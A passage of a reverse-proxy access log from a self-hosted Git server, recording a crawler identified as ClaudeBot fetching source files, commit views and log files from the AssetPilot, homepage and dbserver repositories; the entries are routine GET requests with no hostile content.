ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11886] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12217] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 216.73.216.188] [Length 11345] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15559] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14918] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 42889] [Gzip 12.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13104] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 12398] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 123931] [Gzip 13.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" [Client 216.73.216.188] [Length 14789] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 13324] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 13370] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/css" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/css" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 216.73.216.188] [Length 21805] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 25211] [Gzip 10.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10011] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 216.73.216.188] [Length 11074] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" [Client 216.73.216.188] [Length 33861] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15542] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" [Client 216.73.216.188] [Length 33674] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 216.73.216.188] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 12448] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11300] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" [Client 216.73.216.188] [Length 36058] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/css" [Client 216.73.216.188] [Length 10079] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" [Client 216.73.216.188] [Length 11175] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" [Client 216.73.216.188] [Length 23956] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12787] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 216.73.216.188] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15536] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=source" [Client 216.73.216.188] [Length 11683] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14292] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 216.73.216.188] [Length 10085] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10116] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13526] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css/style.css" [Client 216.73.216.188] [Length 12660] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 11422] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16170] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 21080] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 11534] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15542] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 9774] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/types.ts" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr 